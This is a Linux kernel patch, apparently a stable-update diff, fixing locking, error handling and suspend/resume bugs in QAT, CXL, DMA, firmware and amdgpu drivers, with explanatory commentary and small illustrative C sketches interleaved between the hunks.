+index 0a55a4f34dcfd..20f50d0e65f89 100644
+--- a/drivers/crypto/qat/qat_common/adf_accel_devices.h
++++ b/drivers/crypto/qat/qat_common/adf_accel_devices.h
+@@ -296,6 +296,7 @@ struct adf_accel_dev {
+ 			u8 pf_compat_ver;
+ 		} vf;
+ 	};
++	struct mutex state_lock; /* protect state of the device */
+ 	bool is_vf;
+ 	u32 accel_id;
+ };
+diff --git a/drivers/crypto/qat/qat_common/adf_common_drv.h b/drivers/crypto/qat/qat_common/adf_common_drv.h
+index 7bb477c3ce25f..bff613eec5c4b 100644
+--- a/drivers/crypto/qat/qat_common/adf_common_drv.h
++++ b/drivers/crypto/qat/qat_common/adf_common_drv.h
+@@ -58,6 +58,9 @@ void adf_dev_stop(struct adf_accel_dev *accel_dev);
+ void adf_dev_shutdown(struct adf_accel_dev *accel_dev);
+ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev);
+ 
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool init_config);
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool cache_config);
++
+ void adf_devmgr_update_class_index(struct adf_hw_device_data *hw_data);
+ void adf_clean_vf_map(bool);
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_dev_mgr.c b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+index 4c752eed10fea..86ee36feefad3 100644
+--- a/drivers/crypto/qat/qat_common/adf_dev_mgr.c
++++ b/drivers/crypto/qat/qat_common/adf_dev_mgr.c
+@@ -223,6 +223,7 @@ int adf_devmgr_add_dev(struct adf_accel_dev *accel_dev,
+ 		map->attached = true;
+ 		list_add_tail(&map->list, &vfs_table);
+ 	}
++	mutex_init(&accel_dev->state_lock);
+ unlock:
+ 	mutex_unlock(&table_lock);
+ 	return ret;
+@@ -269,6 +270,7 @@ void adf_devmgr_rm_dev(struct adf_accel_dev *accel_dev,
+ 		}
+ 	}
+ unlock:
++	mutex_destroy(&accel_dev->state_lock);
+ 	list_del(&accel_dev->list);
+ 	mutex_unlock(&table_lock);
+ }
+diff --git a/drivers/crypto/qat/qat_common/adf_init.c b/drivers/crypto/qat/qat_common/adf_init.c
+index 33a9a46d69494..d6f3314246179 100644
+--- a/drivers/crypto/qat/qat_common/adf_init.c
++++ b/drivers/crypto/qat/qat_common/adf_init.c
+@@ -389,3 +389,67 @@ int adf_dev_shutdown_cache_cfg(struct adf_accel_dev *accel_dev)
+ 
+ 	return 0;
+ }
++
++int adf_dev_down(struct adf_accel_dev *accel_dev, bool reconfig)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (!adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already down\n",
++			 accel_dev->accel_id);
++		ret = -EINVAL;
++		goto out;
++	}
++
++	if (reconfig) {
++		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		goto out;
++	}
++
++	adf_dev_stop(accel_dev);
++	adf_dev_shutdown(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_down);
++
++int adf_dev_up(struct adf_accel_dev *accel_dev, bool config)
++{
++	int ret = 0;
++
++	if (!accel_dev)
++		return -EINVAL;
++
++	mutex_lock(&accel_dev->state_lock);
++
++	if (adf_dev_started(accel_dev)) {
++		dev_info(&GET_DEV(accel_dev), "Device qat_dev%d already up\n",
++			 accel_dev->accel_id);
++		ret = -EALREADY;
++		goto out;
++	}
++
++	if (config && GET_HW_DATA(accel_dev)->dev_config) {
++		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
++		if (unlikely(ret))
++			goto out;
++	}
++
++	ret = adf_dev_init(accel_dev);
++	if (unlikely(ret))
++		goto out;
++
++	ret = adf_dev_start(accel_dev);
++
++out:
++	mutex_unlock(&accel_dev->state_lock);
++	return ret;
++}
++EXPORT_SYMBOL_GPL(adf_dev_up);
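
Taken together, the new state_lock and the adf_dev_up()/adf_dev_down() helpers serialize device bring-up and teardown, so two writers racing on the sysfs state attribute cannot interleave init with shutdown. A rough pthread sketch of the same guarded transition (illustrative only, not the QAT API):

  #include <errno.h>
  #include <pthread.h>
  #include <stdbool.h>

  struct dev_state {
      pthread_mutex_t lock;
      bool started;
  };

  static int dev_up(struct dev_state *d)
  {
      int ret = 0;

      pthread_mutex_lock(&d->lock);
      if (d->started) {
          ret = -EALREADY;        /* mirrors the "already up" early exit */
          goto out;
      }
      /* config + init + start would run here; on success: */
      d->started = true;
  out:
      pthread_mutex_unlock(&d->lock);
      return ret;
  }

  static int dev_down(struct dev_state *d)
  {
      int ret = 0;

      pthread_mutex_lock(&d->lock);
      if (!d->started) {
          ret = -EINVAL;          /* mirrors the "already down" exit */
          goto out;
      }
      /* stop + shutdown would run here */
      d->started = false;
  out:
      pthread_mutex_unlock(&d->lock);
      return ret;
  }

Note the mutex lives in the device structure itself and, per the adf_dev_mgr.c hunks, is initialized in adf_devmgr_add_dev() and destroyed in adf_devmgr_rm_dev(), matching its owner's lifetime.
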
+diff --git a/drivers/crypto/qat/qat_common/adf_sysfs.c b/drivers/crypto/qat/qat_common/adf_sysfs.c
+index e8b078e719c20..3eb6611ab1b11 100644
+--- a/drivers/crypto/qat/qat_common/adf_sysfs.c
++++ b/drivers/crypto/qat/qat_common/adf_sysfs.c
+@@ -50,38 +50,21 @@ static ssize_t state_store(struct device *dev, struct device_attribute *attr,
+ 
+ 	switch (ret) {
+ 	case DEV_DOWN:
+-		if (!adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already down\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Stopping device qat_dev%d\n", accel_id);
+ 
+-		ret = adf_dev_shutdown_cache_cfg(accel_dev);
++		ret = adf_dev_down(accel_dev, true);
+ 		if (ret < 0)
+ 			return -EINVAL;
+ 
+ 		break;
+ 	case DEV_UP:
+-		if (adf_dev_started(accel_dev)) {
+-			dev_info(dev, "Device qat_dev%d already up\n",
+-				 accel_id);
+-			return -EINVAL;
+-		}
+-
+ 		dev_info(dev, "Starting device qat_dev%d\n", accel_id);
+ 
+-		ret = GET_HW_DATA(accel_dev)->dev_config(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_init(accel_dev);
+-		if (!ret)
+-			ret = adf_dev_start(accel_dev);
+-
++		ret = adf_dev_up(accel_dev, true);
+ 		if (ret < 0) {
+ 			dev_err(dev, "Failed to start device qat_dev%d\n",
+ 				accel_id);
+-			adf_dev_shutdown_cache_cfg(accel_dev);
++			adf_dev_down(accel_dev, true);
+ 			return ret;
+ 		}
+ 		break;
+diff --git a/drivers/cxl/core/hdm.c b/drivers/cxl/core/hdm.c
+index d1d2caea5c626..5aa0726aafe6f 100644
+--- a/drivers/cxl/core/hdm.c
++++ b/drivers/cxl/core/hdm.c
+@@ -214,8 +214,11 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 
+ 	lockdep_assert_held_write(&cxl_dpa_rwsem);
+ 
+-	if (!len)
+-		goto success;
++	if (!len) {
++		dev_warn(dev, "decoder%d.%d: empty reservation attempted\n",
++			 port->id, cxled->cxld.id);
++		return -EINVAL;
++	}
+ 
+ 	if (cxled->dpa_res) {
+ 		dev_dbg(dev, "decoder%d.%d: existing allocation %pr assigned\n",
+@@ -268,7 +271,6 @@ static int __cxl_dpa_reserve(struct cxl_endpoint_decoder *cxled,
+ 		cxled->mode = CXL_DECODER_MIXED;
+ 	}
+ 
+-success:
+ 	port->hdm_end++;
+ 	get_device(&cxled->cxld.dev);
+ 	return 0;
+@@ -727,6 +729,13 @@ static int init_hdm_decoder(struct cxl_port *port, struct cxl_decoder *cxld,
+ 				 port->id, cxld->id);
+ 			return -ENXIO;
+ 		}
++
++		if (size == 0) {
++			dev_warn(&port->dev,
++				 "decoder%d.%d: Committed with zero size\n",
++				 port->id, cxld->id);
++			return -ENXIO;
++		}
+ 		port->commit_end = cxld->id;
+ 	} else {
+ 		/* unless / until type-2 drivers arrive, assume type-3 */
+diff --git a/drivers/dma/at_xdmac.c b/drivers/dma/at_xdmac.c
+index d6c9781cd46af..bfc8ae2143957 100644
+--- a/drivers/dma/at_xdmac.c
++++ b/drivers/dma/at_xdmac.c
+@@ -243,6 +243,7 @@ struct at_xdmac {
+ 	int			irq;
+ 	struct clk		*clk;
+ 	u32			save_gim;
++	u32			save_gs;
+ 	struct dma_pool		*at_xdmac_desc_pool;
+ 	const struct at_xdmac_layout	*layout;
+ 	struct at_xdmac_chan	chan[];
+@@ -1988,6 +1989,7 @@ static int __maybe_unused atmel_xdmac_suspend(struct device *dev)
+ 		}
+ 	}
+ 	atxdmac->save_gim = at_xdmac_read(atxdmac, AT_XDMAC_GIM);
++	atxdmac->save_gs = at_xdmac_read(atxdmac, AT_XDMAC_GS);
+ 
+ 	at_xdmac_off(atxdmac);
+ 	clk_disable_unprepare(atxdmac->clk);
+@@ -2027,7 +2029,8 @@ static int __maybe_unused atmel_xdmac_resume(struct device *dev)
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CNDC, atchan->save_cndc);
+ 			at_xdmac_chan_write(atchan, AT_XDMAC_CIE, atchan->save_cim);
+ 			wmb();
+-			at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
++			if (atxdmac->save_gs & atchan->mask)
++				at_xdmac_write(atxdmac, AT_XDMAC_GE, atchan->mask);
+ 		}
+ 	}
+ 	return 0;
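
The at_xdmac fix snapshots the global status register at suspend (save_gs records which channels were actually running) and, at resume, re-enables only those channels instead of unconditionally enabling every one. A simplified sketch of the save/conditional-restore idea, with the register modeled as a plain bitmask:

  #include <stdint.h>

  struct dma_ctl {
      uint32_t gs;        /* global status: bit n set = channel n running */
      uint32_t save_gs;   /* snapshot taken at suspend time */
  };

  static void dma_suspend(struct dma_ctl *c)
  {
      c->save_gs = c->gs;     /* remember which channels were active */
      c->gs = 0;              /* controller loses state while powered down */
  }

  static void dma_resume(struct dma_ctl *c, int nchan)
  {
      for (int ch = 0; ch < nchan; ch++) {
          uint32_t mask = (uint32_t)1 << ch;

          /* Re-enable a channel only if it was running before suspend;
           * blindly enabling all channels could kick off idle ones with
           * stale descriptors. */
          if (c->save_gs & mask)
              c->gs |= mask;
      }
  }
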
+diff --git a/drivers/dma/dw-edma/dw-edma-core.c b/drivers/dma/dw-edma/dw-edma-core.c
+index 52bdf04aff511..ef4cdcf6beba0 100644
+--- a/drivers/dma/dw-edma/dw-edma-core.c
++++ b/drivers/dma/dw-edma/dw-edma-core.c
+@@ -170,7 +170,7 @@ static void vchan_free_desc(struct virt_dma_desc *vdesc)
+ 	dw_edma_free_desc(vd2dw_edma_desc(vdesc));
+ }
+ 
+-static void dw_edma_start_transfer(struct dw_edma_chan *chan)
++static int dw_edma_start_transfer(struct dw_edma_chan *chan)
+ {
+ 	struct dw_edma_chunk *child;
+ 	struct dw_edma_desc *desc;
+@@ -178,16 +178,16 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 
+ 	vd = vchan_next_desc(&chan->vc);
+ 	if (!vd)
+-		return;
++		return 0;
+ 
+ 	desc = vd2dw_edma_desc(vd);
+ 	if (!desc)
+-		return;
++		return 0;
+ 
+ 	child = list_first_entry_or_null(&desc->chunk->list,
+ 					 struct dw_edma_chunk, list);
+ 	if (!child)
+-		return;
++		return 0;
+ 
+ 	dw_edma_v0_core_start(child, !desc->xfer_sz);
+ 	desc->xfer_sz += child->ll_region.sz;
+@@ -195,6 +195,8 @@ static void dw_edma_start_transfer(struct dw_edma_chan *chan)
+ 	list_del(&child->list);
+ 	kfree(child);
+ 	desc->chunks_alloc--;
++
++	return 1;
+ }
+ 
+ static int dw_edma_device_config(struct dma_chan *dchan,
+@@ -277,9 +279,12 @@ static void dw_edma_device_issue_pending(struct dma_chan *dchan)
+ 	struct dw_edma_chan *chan = dchan2dw_edma_chan(dchan);
+ 	unsigned long flags;
+ 
++	if (!chan->configured)
++		return;
++
+ 	spin_lock_irqsave(&chan->vc.lock, flags);
+-	if (chan->configured && chan->request == EDMA_REQ_NONE &&
+-	    chan->status == EDMA_ST_IDLE && vchan_issue_pending(&chan->vc)) {
++	if (vchan_issue_pending(&chan->vc) && chan->request == EDMA_REQ_NONE &&
++	    chan->status == EDMA_ST_IDLE) {
+ 		chan->status = EDMA_ST_BUSY;
+ 		dw_edma_start_transfer(chan);
+ 	}
+@@ -572,14 +577,14 @@ static void dw_edma_done_interrupt(struct dw_edma_chan *chan)
+ 		switch (chan->request) {
+ 		case EDMA_REQ_NONE:
+ 			desc = vd2dw_edma_desc(vd);
+-			if (desc->chunks_alloc) {
+-				chan->status = EDMA_ST_BUSY;
+-				dw_edma_start_transfer(chan);
+-			} else {
++			if (!desc->chunks_alloc) {
+ 				list_del(&vd->node);
+ 				vchan_cookie_complete(vd);
+-				chan->status = EDMA_ST_IDLE;
+ 			}
++
++			/* Continue transferring if there are remaining chunks or issued requests.
++			 */
++			chan->status = dw_edma_start_transfer(chan) ? EDMA_ST_BUSY : EDMA_ST_IDLE;
+ 			break;
+ 
+ 		case EDMA_REQ_STOP:
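
Making dw_edma_start_transfer() return whether it actually queued another chunk lets the done-interrupt handler compute the channel state in one expression, covering both leftover chunks of the current descriptor and descriptors issued while the channel was busy. A reduced sketch of that shape (hypothetical types):

  #include <stdbool.h>

  enum ch_status { ST_IDLE, ST_BUSY };

  /* Returns true when another chunk was started, false when idle. */
  static bool start_next_chunk(int *chunks_left)
  {
      if (*chunks_left == 0)
          return false;
      (*chunks_left)--;       /* stand-in for programming the hardware */
      return true;
  }

  static enum ch_status on_done_irq(int *chunks_left)
  {
      /* One assignment replaces the old if/else that could leave the
       * channel marked idle while work was still pending. */
      return start_next_chunk(chunks_left) ? ST_BUSY : ST_IDLE;
  }
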
+diff --git a/drivers/dma/mv_xor_v2.c b/drivers/dma/mv_xor_v2.c
+index 113834e1167b6..d086ff1824f82 100644
+--- a/drivers/dma/mv_xor_v2.c
++++ b/drivers/dma/mv_xor_v2.c
+@@ -755,7 +755,7 @@ static int mv_xor_v2_probe(struct platform_device *pdev)
+ 
+ 	xor_dev->clk = devm_clk_get(&pdev->dev, NULL);
+ 	if (PTR_ERR(xor_dev->clk) == -EPROBE_DEFER) {
+-		ret = EPROBE_DEFER;
++		ret = -EPROBE_DEFER;
+ 		goto disable_reg_clk;
+ 	}
+ 	if (!IS_ERR(xor_dev->clk)) {
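
The mv_xor_v2 change is a one-character sign fix: kernel callers treat only negative errno values as errors, so returning a bare EPROBE_DEFER (a positive constant) from probe would not defer anything. A tiny illustration of the convention, with the constant inlined purely so the sketch builds standalone:

  #include <stdio.h>

  #define EPROBE_DEFER 517    /* kernel-internal value, for illustration */

  static int probe(int clk_ready)
  {
      if (!clk_ready)
          return -EPROBE_DEFER;   /* negative: the core retries later */
      return 0;
  }

  int main(void)
  {
      int ret = probe(0);

      if (ret < 0)
          printf("probe deferred: %d\n", ret);
      return 0;
  }
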
+diff --git a/drivers/dma/qcom/gpi.c b/drivers/dma/qcom/gpi.c
+index 98d45ee4b4e34..db6d0dc308d29 100644
+--- a/drivers/dma/qcom/gpi.c
++++ b/drivers/dma/qcom/gpi.c
+@@ -1966,7 +1966,6 @@ error_alloc_ev_ring:
+ error_config_int:
+ 	gpi_free_ring(&gpii->ev_ring, gpii);
+ exit_gpi_init:
+-	mutex_unlock(&gpii->ctrl_lock);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/edac/skx_base.c b/drivers/edac/skx_base.c
+index 7e2762f62eec1..bc399469e9594 100644
+--- a/drivers/edac/skx_base.c
++++ b/drivers/edac/skx_base.c
+@@ -510,7 +510,7 @@ rir_found:
+ }
+ 
+ static u8 skx_close_row[] = {
+-	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33
++	15, 16, 17, 18, 20, 21, 22, 28, 10, 11, 12, 13, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_close_column[] = {
+@@ -518,7 +518,7 @@ static u8 skx_close_column[] = {
+ };
+ 
+ static u8 skx_open_row[] = {
+-	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33
++	14, 15, 16, 20, 28, 21, 22, 23, 24, 25, 26, 27, 29, 30, 31, 32, 33, 34
+ };
+ 
+ static u8 skx_open_column[] = {
+diff --git a/drivers/firmware/arm_scmi/driver.c b/drivers/firmware/arm_scmi/driver.c
+index ffdad59ec81fc..fe06dc1936896 100644
+--- a/drivers/firmware/arm_scmi/driver.c
++++ b/drivers/firmware/arm_scmi/driver.c
+@@ -1981,7 +1981,7 @@ static int scmi_xfer_info_init(struct scmi_info *sinfo)
+ 		return ret;
+ 
+ 	ret = __scmi_xfer_info_init(sinfo, &sinfo->tx_minfo);
+-	if (!ret && idr_find(&sinfo->rx_idr, SCMI_PROTOCOL_BASE))
++	if (!ret && !idr_is_empty(&sinfo->rx_idr))
+ 		ret = __scmi_xfer_info_init(sinfo, &sinfo->rx_minfo);
+ 
+ 	return ret;
+diff --git a/drivers/firmware/qcom_scm.c b/drivers/firmware/qcom_scm.c
+index cdbfe54c81467..51eb85354c058 100644
+--- a/drivers/firmware/qcom_scm.c
++++ b/drivers/firmware/qcom_scm.c
+@@ -1418,8 +1418,7 @@ static int qcom_scm_probe(struct platform_device *pdev)
+ static void qcom_scm_shutdown(struct platform_device *pdev)
+ {
+ 	/* Clean shutdown, disable download mode to allow normal restart */
+-	if (download_mode)
+-		qcom_scm_set_download_mode(false);
++	qcom_scm_set_download_mode(false);
+ }
+ 
+ static const struct of_device_id qcom_scm_dt_match[] = {
+diff --git a/drivers/firmware/stratix10-svc.c b/drivers/firmware/stratix10-svc.c
+index bde1f543f5298..80f4e2d14e046 100644
+--- a/drivers/firmware/stratix10-svc.c
++++ b/drivers/firmware/stratix10-svc.c
+@@ -1133,8 +1133,8 @@ static int stratix10_svc_drv_probe(struct platform_device *pdev)
+ 		return ret;
+ 
+ 	genpool = svc_create_memory_pool(pdev, sh_memory);
+-	if (!genpool)
+-		return -ENOMEM;
++	if (IS_ERR(genpool))
++		return PTR_ERR(genpool);
+ 
+ 	/* allocate service controller and supporting channel */
+ 	controller = devm_kzalloc(dev, sizeof(*controller), GFP_KERNEL);
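
The stratix10 fix matters because svc_create_memory_pool() reports failure through an encoded error pointer rather than NULL, so the old !genpool test could never fire and a failed pool would be used later. A self-contained sketch of the ERR_PTR convention, reimplemented here purely for illustration:

  #include <stdio.h>

  #define MAX_ERRNO 4095

  static inline void *ERR_PTR(long error) { return (void *)error; }
  static inline long PTR_ERR(const void *ptr) { return (long)ptr; }
  static inline int IS_ERR(const void *ptr)
  {
      /* Error pointers occupy the top 4095 values of the address space. */
      return (unsigned long)ptr >= (unsigned long)-MAX_ERRNO;
  }

  static int backing;

  static void *create_pool(int fail)
  {
      if (fail)
          return ERR_PTR(-12);    /* -ENOMEM encoded in the pointer */
      return &backing;
  }

  int main(void)
  {
      void *p = create_pool(1);

      if (IS_ERR(p))              /* a plain "!p" check misses this */
          printf("pool creation failed: %ld\n", PTR_ERR(p));
      return 0;
  }

The general rule: check a return value with the idiom matching what the function documents - NULL for NULL-returning allocators, IS_ERR()/PTR_ERR() for ERR_PTR-returning ones - since mixing them silently accepts failures.
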
+diff --git a/drivers/fpga/fpga-bridge.c b/drivers/fpga/fpga-bridge.c
+index 13918c8c839ea..833ce13ff6f86 100644
+--- a/drivers/fpga/fpga-bridge.c
++++ b/drivers/fpga/fpga-bridge.c
+@@ -115,7 +115,7 @@ static int fpga_bridge_dev_match(struct device *dev, const void *data)
+ /**
+  * fpga_bridge_get - get an exclusive reference to an fpga bridge
+  * @dev:	parent device that fpga bridge was registered with
+- * @info:	fpga manager info
++ * @info:	fpga image specific information
+  *
+  * Given a device, get an exclusive reference to an fpga bridge.
+  *
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 9df5dcedaf3e2..9776e0b488cf6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -35,6 +35,7 @@
+ #include <linux/devcoredump.h>
+ #include <generated/utsrelease.h>
+ #include <linux/pci-p2pdma.h>
++#include <linux/apple-gmux.h>
+ 
+ #include <drm/drm_aperture.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -3942,12 +3943,15 @@ fence_driver_init:
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_register(adev->pdev, amdgpu_device_vga_set_decode);
+ 
+-	if (amdgpu_device_supports_px(ddev)) {
+-		px = true;
++	px = amdgpu_device_supports_px(ddev);
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_register_client(adev->pdev,
+ 					       &amdgpu_switcheroo_ops, px);
++
++	if (px)
+ 		vga_switcheroo_init_domain_pm_ops(adev->dev, &adev->vga_pm_domain);
+-	}
+ 
+ 	if (adev->gmc.xgmi.pending_reset)
+ 		queue_delayed_work(system_wq, &mgpu_info.delayed_reset_work,
+@@ -4053,6 +4057,7 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ {
+ 	int idx;
++	bool px;
+ 
+ 	amdgpu_fence_driver_sw_fini(adev);
+ 	amdgpu_device_ip_fini(adev);
+@@ -4072,10 +4077,16 @@ void amdgpu_device_fini_sw(struct amdgpu_device *adev)
+ 
+ 	kfree(adev->bios);
+ 	adev->bios = NULL;
+-	if (amdgpu_device_supports_px(adev_to_drm(adev))) {
++
++	px = amdgpu_device_supports_px(adev_to_drm(adev));
++
++	if (px || (!pci_is_thunderbolt_attached(adev->pdev) &&
++				apple_gmux_detect(NULL, NULL)))
+ 		vga_switcheroo_unregister_client(adev->pdev);
++
++	if (px)
+ 		vga_switcheroo_fini_domain_pm_ops(adev->dev);
+-	}
++
+ 	if ((adev->pdev->class >> 8) == PCI_CLASS_DISPLAY_VGA)
+ 		vga_client_unregister(adev->pdev);
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 6c5ea99223bab..99b99f0b42c06 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -1763,7 +1763,8 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 		dc_deinit_callbacks(adev->dm.dc);
+ #endif
+ 
+-	dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
++	if (adev->dm.dc)
++		dc_dmub_srv_destroy(&adev->dm.dc->ctx->dmub_srv);
+ 
+ 	if (dc_enable_dmub_notifications(adev->dm.dc)) {
+ 		kfree(adev->dm.dmub_notify);
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+index 26291db0a3cf6..872d06fe14364 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_psr.c
+@@ -122,6 +122,9 @@ bool amdgpu_dm_link_setup_psr(struct dc_stream_state *stream)
+ 		psr_config.allow_multi_disp_optimizations =
+ 			(amdgpu_dc_feature_mask & DC_PSR_ALLOW_MULTI_DISP_OPT);
+ 
++		if (!psr_su_set_y_granularity(dc, link, stream, &psr_config))
++			return false;
++
+ 		ret = dc_link_setup_psr(link, stream, &psr_config, &psr_context);
+ 
+ 	}
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h
+index 3e5df27aa96fc..1ce19d875358f 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn21/rn_clk_mgr_vbios_smu.h
+@@ -26,6 +26,8 @@
+ #ifndef DAL_DC_RN_CLK_MGR_VBIOS_SMU_H_
+ #define DAL_DC_RN_CLK_MGR_VBIOS_SMU_H_
+ 
++enum dcn_pwr_state;
++
+ int rn_vbios_smu_get_smu_version(struct clk_mgr_internal *clk_mgr);
+ int rn_vbios_smu_set_dispclk(struct clk_mgr_internal *clk_mgr, int requested_dispclk_khz);
+ int rn_vbios_smu_set_dprefclk(struct clk_mgr_internal *clk_mgr);
+@@ -33,7 +35,7 @@ int rn_vbios_smu_set_hard_min_dcfclk(struct clk_mgr_internal *clk_mgr, int reque
+ int rn_vbios_smu_set_min_deep_sleep_dcfclk(struct clk_mgr_internal *clk_mgr, int requested_min_ds_dcfclk_khz);
+ void rn_vbios_smu_set_phyclk(struct clk_mgr_internal *clk_mgr, int requested_phyclk_khz);
+ int rn_vbios_smu_set_dppclk(struct clk_mgr_internal *clk_mgr, int requested_dpp_khz);
+-void rn_vbios_smu_set_dcn_low_power_state(struct clk_mgr_internal *clk_mgr, int display_count);
++void rn_vbios_smu_set_dcn_low_power_state(struct clk_mgr_internal *clk_mgr, enum dcn_pwr_state);
+ void rn_vbios_smu_enable_48mhz_tmdp_refclk_pwrdwn(struct clk_mgr_internal *clk_mgr, bool enable);
+ void rn_vbios_smu_enable_pme_wa(struct clk_mgr_internal *clk_mgr);
+ int rn_vbios_smu_is_periodic_retraining_disabled(struct clk_mgr_internal *clk_mgr);
+diff --git a/drivers/gpu/drm/amd/display/dc/dce60/Makefile b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+index dda596fa1cd76..fee331accc0e7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce60/Makefile
++++ b/drivers/gpu/drm/amd/display/dc/dce60/Makefile
+@@ -23,7 +23,7 @@
+ # Makefile for the 'controller' sub-component of DAL.
+ # It provides the control and status of HW CRTC block.
+ 
+-CFLAGS_AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
++CFLAGS_$(AMDDALPATH)/dc/dce60/dce60_resource.o = $(call cc-disable-warning, override-init)
+ 
+ DCE60 = dce60_timing_generator.o dce60_hw_sequencer.o \
+ 	dce60_resource.o
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+index 020f512e9690e..e958f838c8041 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.c
+@@ -1641,7 +1641,8 @@ noinline bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate)
++		bool fast_validate,
++		bool allow_self_refresh_only)
+ {
+ 	bool out = false;
+ 	bool repopulate_pipes = false;
+@@ -1668,7 +1669,7 @@ noinline bool dcn30_internal_validate_bw(
+ 
+ 	dml_log_pipe_params(&context->bw_ctx.dml, pipes, pipe_cnt);
+ 
+-	if (!fast_validate) {
++	if (!fast_validate || !allow_self_refresh_only) {
+ 		/*
+ 		 * DML favors voltage over p-state, but we're more interested in
+ 		 * supporting p-state over voltage. We can't support p-state in
+@@ -1681,11 +1682,12 @@ noinline bool dcn30_internal_validate_bw(
+ 		if (vlevel < context->bw_ctx.dml.soc.num_states)
+ 			vlevel = dcn20_validate_apply_pipe_split_flags(dc, context, vlevel, split, merge);
+ 	}
+-	if (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
+-			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported) {
++	if (allow_self_refresh_only &&
++	    (fast_validate || vlevel == context->bw_ctx.dml.soc.num_states ||
++			vba->DRAMClockChangeSupport[vlevel][vba->maxMpcComb] == dm_dram_clock_change_unsupported)) {
+ 		/*
+-		 * If mode is unsupported or there's still no p-state support then
+-		 * fall back to favoring voltage.
++		 * If mode is unsupported or there's still no p-state support
++		 * then fall back to favoring voltage.
+ 		 *
+ 		 * We don't actually support prefetch mode 2, so require that we
+ 		 * at least support prefetch mode 1.
+@@ -2056,7 +2058,7 @@ bool dcn30_validate_bandwidth(struct dc *dc,
+ 	BW_VAL_TRACE_COUNT();
+ 
+ 	DC_FP_START();
+-	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate);
++	out = dcn30_internal_validate_bw(dc, context, pipes, &pipe_cnt, &vlevel, fast_validate, true);
+ 	DC_FP_END();
+ 
+ 	if (pipe_cnt == 0)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+index 7d063c7d6a4bf..8e6b8b7368fdb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_resource.h
+@@ -64,7 +64,8 @@ bool dcn30_internal_validate_bw(
+ 		display_e2e_pipe_params_st *pipes,
+ 		int *pipe_cnt_out,
+ 		int *vlevel_out,
+-		bool fast_validate);
++		bool fast_validate,
++		bool allow_self_refresh_only);
+ void dcn30_calculate_wm_and_dlg(
+ 		struct dc *dc, struct dc_state *context,
+ 		display_e2e_pipe_params_st *pipes,
